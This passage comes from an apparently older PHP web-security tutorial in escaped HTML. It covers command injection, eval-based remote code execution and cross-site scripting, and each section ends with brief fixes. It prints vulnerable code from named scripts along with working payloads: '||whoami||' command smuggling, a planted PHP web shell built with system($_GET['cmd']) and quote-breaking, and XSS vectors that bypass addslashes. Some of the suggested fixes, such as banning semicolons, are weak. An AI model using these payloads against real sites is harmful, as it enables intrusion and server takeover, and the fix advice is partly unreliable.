left;&quot;&gt;&lt;b&gt;&lt;i&gt;$cmd=$_GET[&#39;cmd&#39;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;system($cmd);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;So if we make the following request :&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;http://127.0.0.1/test.php?cmd=whoami&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;The command will be executed and the result will be outputed.&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;8.1 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from dig.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$status = $_GET[&#39;status&#39;];&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$ns&amp;nbsp; = $_GET[&#39;ns&#39;];&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$host&amp;nbsp;&amp;nbsp; = $_GET[&#39;host&#39;];&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$query_type&amp;nbsp;&amp;nbsp; = $_GET[&#39;query_type&#39;]; // ANY, MX, A , etc.&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$ip&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = $_SERVER[&#39;REMOTE_ADDR&#39;];&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$self&amp;nbsp;&amp;nbsp; = $_SERVER[&#39;PHP_SELF&#39;];&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;…………………… etc ……………………&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$host = trim($host);&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;$host = strtolower($host);&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;echo(“&amp;lt;span class=\”plainBlue\”&amp;gt;&amp;lt;b&amp;gt;Executing : &amp;lt;u&amp;gt;dig @$ns $host $query_type&amp;lt;/u&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;br&amp;gt;”);&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;echo ‘&amp;lt;pre&amp;gt;’;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;system (“dig @$ns $host $query_type”);&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The “ns” variable is unfiltered and can be specified by the attacker.An attacker can use any command&lt;br /&gt;that he want through this variable.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Lets make a request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/dig.php?ns=whoam&amp;amp;host=sirgod.net&amp;amp;query_type=NS&amp;amp;status=digging&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and&lt;br /&gt;will not work of course.Lets do something a little bit tricky.We have the AND operator&lt;br /&gt;( || ) and we will use it to separe the commands.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/dig.php?ns=||whoami||&amp;amp;host=sirgod.net&amp;amp;query_type=NS&amp;amp;status=digging&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Our command will be executed.The command become “dig ||whoami|| sirgod.net NS”.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;8.2 – Advanced example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from add_reg.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;i&gt;$user = $_POST[&#39;user&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$pass1 = $_POST[&#39;pass1&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$pass2 = $_POST[&#39;pass2&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$email1 = $_POST[&#39;email1&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$email2 = $_POST[&#39;email2&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$location = $_POST[&#39;location&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$url = $_POST[&#39;url&#39;];&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$filename = “./sites/”.$user.”.php”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;……………….etc………………….&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$html = “&amp;lt;?php&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$regdate = \”$date\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$user = \”$user\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$pass = \”$pass1\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$email = \”$email1\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$location = \”$location\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;\$url = \”$url\”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;?&amp;gt;”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$fp = fopen($filename, ‘a+’);&lt;/i&gt;&lt;br /&gt; &lt;i&gt;fputs($fp, $html) or die(“Could not open file!”);&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We can see that the script creates a php file in “sites” directory( ourusername.php ).&lt;br /&gt;The script save all the user data in that file so we can inject our evil code into one&lt;br /&gt;field,I choose the “location” variable.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So if we register as an user with the location (set the “location” value) :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php system($_GET[&#39;cmd&#39;]); ?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;the code inside sites/ourusername.php will become :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;$regdate = “13 June 2009, 4:16 PM”;&lt;br /&gt;$user = “pwned”;&lt;br /&gt;$pass = “pwned”;&lt;br /&gt;$email = “pwned@yahoo.com”;&lt;br /&gt;$location = “&amp;lt;?php system($_GET[&#39;cmd&#39;]); ?&amp;gt;”;&lt;br /&gt;$url = “http://google.ro”;&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;————————————————-&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;So we will get an parse error.Not good.We must inject a proper code to get the result that we want.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;Lets inject this code :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;\”;?&amp;gt;&amp;lt;?php system(\$_GET[&#39;cmd&#39;]);?&amp;gt;&amp;lt;?php \$xxx=\”:D&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;So the code inside sites/ourusername.php will become :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;br /&gt;$regdate = “13 June 2009, 4:16 PM”;&lt;br /&gt;$user = “pwned”;&lt;br /&gt;$pass = “pwned”;&lt;br /&gt;$email = “pwned@yahoo.com”;&lt;br /&gt;$location = “”;?&amp;gt;&amp;lt;?php system($_GET[&#39;cmd&#39;]);?&amp;gt;&amp;lt;?php $xxx=”:D”;&lt;br /&gt;$url = “http://google.ro”;&lt;br /&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;and we will have no error.Why?See the code :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$location = “”;?&amp;gt;&amp;lt;?php system($_GET[&#39;cmd&#39;]);?&amp;gt;&amp;lt;?php $xxx=”:D”;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Lets split it :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$location = “”;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;?php system($_GET[&#39;cmd&#39;]);?&amp;gt;&lt;br /&gt;&amp;lt;?php $xxx=”:D”;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We set the location value to “”,close the first php tags,open the tags&lt;br /&gt;again,wrote our evil code,close the tags and open other and add a variable&lt;br /&gt;“xxx” because we dont want any error.I wrote that code because I want no&lt;br /&gt;error,can be modified to be small but will give some errors(will not&lt;br /&gt;stop us to execute commands but looks ugly).&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So if we make the following request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/sites/ourusername.php?cmd=whoami&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;And our command will be succesfully executed.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;8.3 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Simple way:&amp;nbsp; &lt;i&gt;Don’t allow user input .&lt;/i&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&amp;nbsp;Another way : Use escapeshellarg() and escapeshellcmd() functions .&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Example : $cmd=escapeshellarg($_GET’cmd’]);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;9) Remote Code Execution&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt; You must inject valid PHP code including terminating statements ( ; ) .&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;9.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;$code=$_GET[&#39;code&#39;];&lt;br /&gt;eval($code);&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The “eval” function evaluate a string as PHP code.So in this case we are able to execute&lt;br /&gt;our PHP code.Examples :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/test.php?code=phpinfo();&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/test.php?code=system(whoami);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;And we will see the output of the PHP code injected by us.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;9.1 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from system/services/init.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$conf = array_merge($conf,$confweb);&lt;br /&gt;}&lt;br /&gt;@eval(stripslashes($_REQUEST[&#39;anticode&#39;]));&lt;br /&gt;if ( $_SERVER[&#39;HTTP_CLIENT_IP&#39;] )&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We see that the “anticode” is requested by $_REQUEST method and the coder&lt;br /&gt;“secured” the input with “stripslashes” which is useless here,we don’t need&lt;br /&gt;slashes to execute our php code only if we want to include a URL.So we can&lt;br /&gt;inject our PHP code.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?anticode=phpinfo();&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Great,injection done,phpinfo() result printed.No include because slashes are&lt;br /&gt;removed,but we can use system() or another function to execute commands.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;9.2 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Simple way : Don’t allow “;” and the PHP code will be invalid.&lt;br /&gt;Another way : Don’t allow any special char like “(” or “)” etc.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;10) Cross-Site Scripting&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips : &lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;You can use alot of vectors,can try alot of bypass methods,you cand&lt;br /&gt;find them around the web.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;10.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;$name=$_GET[&#39;name&#39;];&lt;br /&gt;print $name;&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The input is not filtered,an attacker can inject JavaScript code.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?name=&amp;lt;script&amp;gt;alert(“XSS”)&amp;lt;/script&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;A popup with XSS message will be displayed.JavaScript code succesfully executed.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;10.1 – Another example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;$name=addslashes($_GET[&#39;name&#39;]);&lt;br /&gt;print ‘&amp;lt;table name=”‘.$name.’”&amp;gt;&amp;lt;/table&amp;gt;’;&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Not an advanced example,only a bit complicated.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?name=”&amp;gt;&amp;lt;script&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/script&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Why this vector?We put ” because we must close the ” from the “name” atribut&lt;br /&gt;of the “table” tag and &amp;gt; to close the “table” tag.Why String.fromCharCode?Because&lt;br /&gt;we want to bypass addslashes() function.Injection done.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;10.2 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from modules.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;if (isset($name)) {&lt;/i&gt;&lt;/b&gt;&lt;br /&gt; &lt;b&gt;&lt;i&gt;……………….. etc…………….&lt;/i&gt;&lt;/b&gt;&lt;br /&gt; &lt;b&gt;&lt;i&gt;} else {&lt;/i&gt;&lt;/b&gt;&lt;br /&gt; &lt;b&gt;&lt;i&gt;die(“Le fichier modules/”.$name.”/”.$mod_file.”.php est inexistant”);&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The “name” variable is injectable,input is not filtered,so we can inject&lt;br /&gt;with ease JavaScript code.Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/test.php?name=&amp;lt;script&amp;gt;alert(“XSS”)&amp;lt;/script&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;10.3 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Simple way 